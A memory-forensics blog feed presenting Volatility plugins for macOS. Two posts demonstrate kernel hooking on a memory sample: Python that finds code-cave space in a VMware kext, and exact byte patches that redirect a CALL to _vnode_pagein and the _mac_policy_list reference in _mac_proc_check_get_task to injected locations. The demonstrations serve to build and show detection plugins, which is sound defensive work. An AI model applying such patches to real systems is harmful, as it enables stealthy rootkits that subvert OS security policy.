tag:blogger.com,1999:blog-47842848373992626262024-03-18T21:17:39.153-07:00What's in your silicon?siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-4784284837399262626.post-57738042223794585282014-11-15T23:21:00.000-08:002014-11-15T23:21:04.416-08:00Viewing Thread Information in Mac Memory<span style="font-family: Arial, Helvetica, sans-serif;">This is a short post about my mac_threads plugin. The plugin analyzes the threads of each process/task in an OS X memory sample. For every thread it reports the registers, the argument (exec string), stack information, start address, user id, debugging information, priority, and more. Threads can be filtered by process id or displayed for all processes.</span><br />
<br />
<a name='more'></a><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">Plugin Use Cases:</span></b><br />
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Find the owner/uid of a thread.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Detect DTrace probing.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Detect hardware debugging.</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">View the execution state of a thread.</span></li>
</ul>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnO7bJvEuIPP6yaDpjccWm9lz8phuxEEJOGEziM1pP4sr9QX4jI6Ud2TyZYT7-ngYKglK7rcH1KbvL5yrOzmbtoTsQzJohlLIoa-kwgd632m0t_ZeCWoLx96YhT9I2ZUHQkWK3SPEDA54G/s1600/threads.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnO7bJvEuIPP6yaDpjccWm9lz8phuxEEJOGEziM1pP4sr9QX4jI6Ud2TyZYT7-ngYKglK7rcH1KbvL5yrOzmbtoTsQzJohlLIoa-kwgd632m0t_ZeCWoLx96YhT9I2ZUHQkWK3SPEDA54G/s1600/threads.png" height="100" width="400" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">You can grab the plugin from my <a href="https://github.com/siliconblade/volatility/blob/master/mac/threads.py" target="_blank">GitHub repository</a> [1].</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">References</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">[1] https://github.com/siliconblade/volatility/blob/master/mac/threads.py</span><br />
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-42294996330964497732014-11-15T23:06:00.000-08:002014-11-15T23:21:20.101-08:00Finding Call Reference Hooks in Mac Memory<div style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br />
In this blog post the call reference to _vnode_pagein inside _ps_read_file will be modified to demonstrate a call reference hook, and a Volatility Framework plugin that detects this type of hooking will be presented.<br />
<br />
<a name='more'></a><br />
First, find a location where the code could be injected; in this case it is 0xffffff7f89dba6e5, near the end of the __text section of the com.vmware.kext.vmhgfs kext:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">import volatility.obj as obj</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;"></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">## This section (from a plugin's calculate() method, hence self.addrspace) gets the address for possible code injection in the com.vmware.kext.vmhgfs kext</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;"># get the address of the kernel extension (kext) list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">p = self.addrspace.profile.get_symbol("_kmod")</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">kmod = kmodaddr.dereference_as("kmod_info")</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;"># walk the list to find a suitable kext to place the trampoline in</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">while kmod.is_valid():</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">    if str(kmod.name) == "com.vmware.kext.vmhgfs":</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        mh = obj.Object('mach_header_64', offset = kmod.address, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        o = mh.obj_offset</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        # skip the 32-byte mach_header_64; the load commands follow it</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        o += 32</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        txt_data_end = 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        # walk the load commands to find the __TEXT segment</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        for i in xrange(0, mh.ncmds):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">            seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">            # only LC_SEGMENT_64 (0x19) commands carry sections</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">            if seg.cmd == 0x19:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                for j in xrange(0, seg.nsects):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                    # section_64 entries (80 bytes each) follow the 0x48-byte segment command</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                    sect = obj.Object('section_64', offset = o + 0x48 + 80*j, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                    sect_name = "".join(map(str, sect.sectname)).strip(' \t\r\n\0')</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                    # find the __text section of the __TEXT segment</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                    if str(seg.segname) == "__TEXT" and sect_name == "__text":</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                        print "{0:#10x} {1:#2x} {2} {3}".format(sect.addr, seg.cmd, seg.segname, sect_name)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                        # the fake function goes 50 bytes before the end of __text</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                        txt_data_end = sect.addr + sect.m('size') - 50</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                        break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">            if txt_data_end != 0:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">                break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">            # advance to the next load command</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">            o += seg.cmdsize</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        print "The fake function will be at {0:#10x}".format(txt_data_end)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">        break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small; white-space: pre;">    kmod = kmod.next</span><br />
<br />
The addresses for the functions in question in the original memory sample:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Function Name<span class="Apple-tab-span" style="white-space: pre;"> </span>Original Address</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_ps_read_file<span class="Apple-tab-span" style="white-space: pre;"> </span>0xffffff80086049b0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_vnode_pagein<span class="Apple-tab-span" style="white-space: pre;"> </span>0xffffff80089be9c0</span><br />
<br />
The disassembly of the original _ps_read_file showing the call reference to _vnode_pagein:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b0 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b1 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b4 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b6 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b7 4883ec10 SUB RSP, 0x10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049bb 4d89ce MOV R14, R9</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049be 4489c0 MOV EAX, R8D</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c1 c1e80c SHR EAX, 0xc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c4 488d1d75a96a00 LEA RBX, [RIP+0x6aa975]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049cb ff0483 INC DWORD [RBX+RAX*4]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049ce 034f18 ADD ECX, [RDI+0x18]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d1 488b3f MOV RDI, [RDI]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d4 448b4d10 MOV R9D, [RBP+0x10]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d8 48c7042400000000 MOV QWORD [RSP], 0x0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e0 e8db9f3b00 CALL 0xffffff80089be9c0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e5 89c1 MOV ECX, EAX</span><br />
<br />
<br />
Modify the CALL instruction to refer to the fake location (0xffffff7f89dba6e5):<br />
<br />
In e8db9f3b00, e8 is the opcode of the near relative CALL and the remaining four bytes (db9f3b00) are the little-endian 32-bit relative displacement: the target address less the address of the instruction that follows the CALL (0xffffff80089be9c0 - 0xffffff80086049e5 = 0x003B9FDB).<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Original Reference<span class="Apple-tab-span" style="white-space: pre;"> </span>Fake Reference<span class="Apple-tab-span" style="white-space: pre;"> </span>Code to Write</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0x003B9FDB<span class="Apple-tab-span" style="white-space: pre;"> </span> 0x817B5D00<span class="Apple-tab-span" style="white-space: pre;"> </span>\xe8\x00\x5D\x7B\x81</span><br />
<br />
After the five bytes at the original CALL (0xffffff80086049e0) are rewritten, the disassembly looks like the following:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b0 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b1 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b4 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b6 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049b7 4883ec10 SUB RSP, 0x10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049bb 4d89ce MOV R14, R9</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049be 4489c0 MOV EAX, R8D</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c1 c1e80c SHR EAX, 0xc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049c4 488d1d75a96a00 LEA RBX, [RIP+0x6aa975]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049cb ff0483 INC DWORD [RBX+RAX*4]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049ce 034f18 ADD ECX, [RDI+0x18]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d1 488b3f MOV RDI, [RDI]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d4 448b4d10 MOV R9D, [RBP+0x10]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049d8 48c7042400000000 MOV QWORD [RSP], 0x0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e0 e8005d7b81 CALL 0xffffff7f89dba6e5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e5 89c1 MOV ECX, EAX</span><br />
<br />
<br />
The call to _vnode_pagein has been modified to call the code at the fake address.<br />
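As an added example (not the author's plugin code), the rel32 arithmetic above and the resulting detection check in Python 3: it decodes and encodes E8 rel32 CALLs and flags any CALL in a disassembly listing whose target falls outside the kernel's __TEXT range or is not a known function start. The kernel text range and symbol map are constructed assumptions standing in for what a Volatility profile would supply; the listing format is the one shown in this post.

```python
import re

MOD32 = 2 ** 32
MOD64 = 2 ** 64

# Constructed sample: the disassembly of _ps_read_file shown in this post, before the
# CALL at 0xffffff80086049e0 was rewritten. Format per line: "<addr> <hex bytes> <asm>".
ORIGINAL_LISTING = """\
0xffffff80086049b0 55 PUSH RBP
0xffffff80086049b1 4889e5 MOV RBP, RSP
0xffffff80086049b4 4156 PUSH R14
0xffffff80086049b6 53 PUSH RBX
0xffffff80086049b7 4883ec10 SUB RSP, 0x10
0xffffff80086049bb 4d89ce MOV R14, R9
0xffffff80086049be 4489c0 MOV EAX, R8D
0xffffff80086049c1 c1e80c SHR EAX, 0xc
0xffffff80086049c4 488d1d75a96a00 LEA RBX, [RIP+0x6aa975]
0xffffff80086049cb ff0483 INC DWORD [RBX+RAX*4]
0xffffff80086049ce 034f18 ADD ECX, [RDI+0x18]
0xffffff80086049d1 488b3f MOV RDI, [RDI]
0xffffff80086049d4 448b4d10 MOV R9D, [RBP+0x10]
0xffffff80086049d8 48c7042400000000 MOV QWORD [RSP], 0x0
0xffffff80086049e0 e8db9f3b00 CALL 0xffffff80089be9c0
0xffffff80086049e5 89c1 MOV ECX, EAX
"""

# The same listing after the hook: only the five CALL bytes differ.
HOOKED_LISTING = ORIGINAL_LISTING.replace(
    "e8db9f3b00 CALL 0xffffff80089be9c0", "e8005d7b81 CALL 0xffffff7f89dba6e5")

# Assumed kernel layout: the kernel __TEXT range and a symbol map (address -> name).
# In a real plugin both come from the Volatility profile; these values are constructed.
KERNEL_TEXT = (0xffffff8008200000, 0xffffff8008c00000)
KERNEL_SYMBOLS = {
    0xffffff80086049b0: "_ps_read_file",
    0xffffff80089be9c0: "_vnode_pagein",
}

LINE_RE = re.compile(r"^(0x[0-9a-f]+)\s+([0-9a-f]+)\s+(.*)$")


def call_target(call_addr, insn_bytes):
    """Decode an E8 rel32 CALL: target = address of the next instruction + signed rel32."""
    if len(insn_bytes) != 5 or insn_bytes[0] != 0xE8:
        raise ValueError("not a 5-byte E8 rel32 CALL")
    rel32 = int.from_bytes(insn_bytes[1:], "little", signed=True)
    return (call_addr + 5 + rel32) % MOD64


def call_rel32(call_addr, target):
    """The displacement from the post's table: target - next instruction, as unsigned 32-bit."""
    return (target - (call_addr + 5)) % MOD32


def encode_call(call_addr, target):
    """The five bytes a rel32 CALL at call_addr needs to reach target ('Code to Write')."""
    return bytes([0xE8]) + call_rel32(call_addr, target).to_bytes(4, "little")


def check_call_references(listing, text_range, symbols):
    """Return (call_addr, target, reason) for every CALL whose target looks hooked.

    The listing supplies instruction boundaries, so an 0xe8 byte inside another
    instruction (e.g. the 'c1e80c' SHR above) is never misread as a CALL.
    """
    findings = []
    lo, hi = text_range
    for line in listing.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        raw = bytes.fromhex(m.group(2))
        if len(raw) != 5 or raw[0] != 0xE8:
            continue
        target = call_target(addr, raw)
        if target not in range(lo, hi):
            # A kernel function calling into a kext (or anywhere else outside the
            # kernel image) is the signature of the hook described in this post.
            findings.append((addr, target, "target outside kernel __TEXT"))
        elif target not in symbols:
            findings.append((addr, target, "target is not a known function start"))
    return findings


if __name__ == "__main__":
    for name, listing in (("original", ORIGINAL_LISTING), ("hooked", HOOKED_LISTING)):
        print(name, check_call_references(listing, KERNEL_TEXT, KERNEL_SYMBOLS))
```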
<br />
The output for the plugin after modifying the memory sample is as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkjHhCVq2unTpUHqlGvYXF7rM6wuAsi8t6GDn4MWeeshFMXSVjjAtPdmqrUrzYwseNIK94bhuFZFgHnN7BnR6BKJsllbepRnRpfMu1gmaFZdNfct851BcdvjTaU6n-x4quwCRxOv33T7O/s1600/call-ref.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkjHhCVq2unTpUHqlGvYXF7rM6wuAsi8t6GDn4MWeeshFMXSVjjAtPdmqrUrzYwseNIK94bhuFZFgHnN7BnR6BKJsllbepRnRpfMu1gmaFZdNfct851BcdvjTaU6n-x4quwCRxOv33T7O/s1600/call-ref.png" height="25" width="400" /></a></div>
<br />
<br />
The check_call_reference.py plugin can be found at my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_call_reference.py" target="_blank">GitHub repository</a> [2].<br />
<br />
<b>References</b><br />
[1] http://reverse.put.as/SyScan360%202013%20Presentation.pdf<br />
[2] https://github.com/siliconblade/volatility/blob/master/mac/check_call_reference.py<br />
<div>
<br /></div>
</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-33717151034439589512014-11-15T22:35:00.003-08:002016-03-15T23:06:55.898-07:00Tracing Bits of Coins in Mac Memory<iframe src="https://drive.google.com/file/d/0B-RHAnFvh1uMNXlmUGpHejJ6S3M/preview" width="580" height="480"></iframe>siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-5130421295848771282014-11-15T22:04:00.003-08:002014-11-15T23:21:43.134-08:00Detecting Shadow TrustedBSD Policy Tables In Mac MemoryIn this blog post the reference of the _mac_policy_list in _mac_proc_check_get_task will be modified to reference the 'shadow' TrustedBSD policy table and a Volatility Framework plugin to detect this type of hooking will be presented.<br />
<br />
<br />
<a name='more'></a><br />
<br />
First, find a location where the shadow policy table could be placed, in this case 0xffffff7f8c04d6e5 (the tail of the __text section of the com.vmware.kext.vmhgfs kext, located with the snippet below):<br />
<br />
<pre><span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">## This section gets the address for possible code injection in the com.vmware.kext.vmhgfs kext
# get address for the kernel extension (kext) list
p = self.addrspace.profile.get_symbol("_kmod")
kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)
kmod = kmodaddr.dereference_as("kmod_info")
# loop thru list to find suitable target to place the trampoline in
while kmod.is_valid():
    if str(kmod.name) == "com.vmware.kext.vmhgfs":
        mh = obj.Object('mach_header_64', offset = kmod.address, vm = self.addrspace)
        o = mh.obj_offset
        # skip the mach_header_64 (32 bytes); the load commands follow it
        o += 32
        txt_data_end = 0
        # walk the load commands to find the __text section of __TEXT
        for i in xrange(0, mh.ncmds):
            seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
            # only LC_SEGMENT_64 (0x19) commands carry section headers
            if seg.cmd == 0x19:
                for j in xrange(0, seg.nsects):
                    # section_64 headers (80 bytes each) follow the 0x48-byte segment command
                    sect = obj.Object('section_64', offset = o + 0x48 + 80*(j), vm = self.addrspace)
                    sect_name = "".join(map(str, sect.sectname)).strip(' \t\r\n\0')
                    # find __text section
                    if str(seg.segname) == "__TEXT" and sect_name == "__text":
                        print "{0:#10x} {1:#2x} {2} {3}".format(sect.addr, seg.cmd, seg.segname, sect_name)
                        txt_data_end = sect.addr + sect.m('size') - 50
                        break
            if txt_data_end != 0:
                break
            # advance to the next load command by its length
            o += seg.cmdsize
        print "The fake function will be at {0:#10x}".format(txt_data_end)
        break
    kmod = kmod.next</span></pre>
<br />
The addresses of the function and of the policy list in the original memory sample:<br />
<br />
<pre><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Name                      Original Address</b>
_mac_proc_check_get_task  0xffffff800ac8ee20
_mac_policy_list          0xffffff800aef4d28</span></pre>
<br />
The disassembly of the original _mac_proc_check_get_task showing the reference to _mac_policy_list:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee20 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee21 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee24 4157 PUSH R15</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee26 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee28 4155 PUSH R13</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2a 4154 PUSH R12</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2c 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2d 50 PUSH RAX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2e 4989f6 MOV R14, RSI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee31 4989ff MOV R15, RDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0xffffff800ac8ee34 488d05ed5e2600 LEA RAX, [RIP+0x265eed]</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee3b 8b400c MOV EAX, [RAX+0xc]</span><br />
<br />
<br />
The LEA instruction in bold uses RIP-relative addressing. RIP holds the address of the next instruction when the displacement is applied, so [RIP+0x265eed] resolves to 0xffffff800aef4d28 (current instruction address + displacement + instruction size = 0xffffff800ac8ee34 + 0x265eed + 7), which is the original address of _mac_policy_list.<br />
<br />
Next, modify the LEA instruction to refer to the fake location (0xffffff7f8c04d6e5). Only the displacement value (0x265EED) needs to change so that it points to the fake policy list. The fake displacement is calculated by reversing the operations used above (fake address - current instruction address - instruction size = 0xffffff7f8c04d6e5 - 0xffffff800ac8ee34 - 7 = -0x7EC41756, which as a signed 32-bit value is encoded as 0x813BE8AA).<br />
<br />
<pre><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Original Displacement   Fake Displacement</b>
0x00265EED              0x813BE8AA

<b>Original Code           Fake Code</b>
488d05<b>ed5e2600</b>          488d05<b>AAE83B81</b></span></pre>
<br />
\x48\x8d\x05 is the fixed part of the instruction: 0x48 is a REX.W prefix selecting a 64-bit operand, 0x8d is the LEA opcode, and the ModRM byte 0x05 (mod=00, reg=000 for RAX, rm=101) selects RIP-relative addressing with a 32-bit displacement in 64-bit mode. The four bytes in bold that follow are the displacement, stored little-endian.<br />
<br />
After we rewrite the code at the original LEA at 0xffffff800ac8ee34, the disassembly will look like the following:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee20 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee21 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee24 4157 PUSH R15</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee26 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee28 4155 PUSH R13</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2a 4154 PUSH R12</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2c 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2d 50 PUSH RAX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2e 4989f6 MOV R14, RSI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee31 4989ff MOV R15, RDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>0xffffff800ac8ee34 488d05aae83b81 LEA RAX, [RIP-0x7ec41756]</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee3b 8b400c MOV EAX, [RAX+0xc]</span><br />
<br />
The reference to _mac_policy_list has been modified to point to the fake location 0xffffff7f8c04d6e5 (0xffffff800ac8ee34 + 7 - 0x7ec41756).<br />
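As an added illustration (not code from this post or from the check_shadow_trustedbsd plugin), the Python 3 snippet below performs the defender's side of the arithmetic above: read the 32-bit displacement of the RIP-relative LEA as a signed value, add the instruction length, and compare the resolved address with the expected location of _mac_policy_list. It also decodes the E8 CALL rel32 form from the check_call_references disassembly earlier on the page, since both forms use the same next-instruction-relative arithmetic. The addresses and instruction bytes are the ones quoted in these posts; in a real plugin the expected address would come from the profile's symbol table rather than a constant.<br />

```python
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF

# Values quoted in the post: the LEA inside _mac_proc_check_get_task and the
# address of _mac_policy_list in the original (unmodified) memory sample.
LEA_ADDR = 0xffffff800ac8ee34
MAC_POLICY_LIST = 0xffffff800aef4d28
ORIGINAL_LEA = bytes.fromhex("488d05ed5e2600")  # LEA RAX, [RIP+0x265eed]
PATCHED_LEA = bytes.fromhex("488d05aae83b81")   # LEA RAX, [RIP-0x7ec41756]

# CALL rel32 from the check_call_references disassembly earlier on the page.
CALL_ADDR = 0xffffff80086049e0
PATCHED_CALL = bytes.fromhex("e8005d7b81")      # CALL 0xffffff7f89dba6e5


def rip_relative_target(insn_addr, insn_bytes):
    """Return the absolute address an x86-64 RIP-relative instruction refers to.

    Two encodings are handled:
      48 8d 05 <disp32>  LEA RAX, [RIP+disp32]  (7 bytes)
      e8 <rel32>         CALL rel32             (5 bytes)
    The displacement is a *signed* 32-bit value relative to the address of the
    next instruction, so the instruction length is added before the displacement.
    """
    if insn_bytes[:3] == b"\x48\x8d\x05" and len(insn_bytes) >= 7:
        disp_off, length = 3, 7
    elif insn_bytes[:1] == b"\xe8" and len(insn_bytes) >= 5:
        disp_off, length = 1, 5
    else:
        raise ValueError("unsupported instruction: %s" % insn_bytes.hex())
    (disp,) = struct.unpack("<i", insn_bytes[disp_off:disp_off + 4])  # signed!
    return (insn_addr + length + disp) & MASK64


def check_reference(insn_addr, insn_bytes, expected_target):
    """'OK' when the reference resolves to the expected symbol, 'Hooked' otherwise."""
    target = rip_relative_target(insn_addr, insn_bytes)
    status = "OK" if target == expected_target else "Hooked"
    return status, target


def main():
    for label, code in (("original LEA", ORIGINAL_LEA), ("patched LEA", PATCHED_LEA)):
        status, target = check_reference(LEA_ADDR, code, MAC_POLICY_LIST)
        print("%-14s -> %#018x  %s" % (label, target, status))
    print("patched CALL   -> %#018x" % rip_relative_target(CALL_ADDR, PATCHED_CALL))


if __name__ == "__main__":
    main()
```

The sign extension in `struct.unpack("<i", ...)` is the step that matters: read as an unsigned value, the patched displacement 0x813BE8AA would resolve to an address far above the kernel instead of the kext location, and the comparison would still flag the hook but report a misleading target.<br />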
<br />
The output for the plugin after modifying the memory sample is as follows:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDMIstMTXnehouzITH9vJAw_X1sxvOszuEO5FQ5LaQ-8GPf5-TROF8Jzj8aNkFdigyQ6iP6UaUTIOIxeB_727BdfyiywbSwRMFPxfqrNJbZni8QzQ8MsWVukE0MtijSlr8MpCT_viOm8eT/s1600/check-trustedbsd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDMIstMTXnehouzITH9vJAw_X1sxvOszuEO5FQ5LaQ-8GPf5-TROF8Jzj8aNkFdigyQ6iP6UaUTIOIxeB_727BdfyiywbSwRMFPxfqrNJbZni8QzQ8MsWVukE0MtijSlr8MpCT_viOm8eT/s1600/check-trustedbsd.png" height="30" width="400" /></a></div>
<br />
The plugin check_shadow_trustedbsd.py can be found at my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_shadow_trustedbsd.py" target="_blank">GitHub repository</a> [3].<br />
<br />
<b>References</b><br />
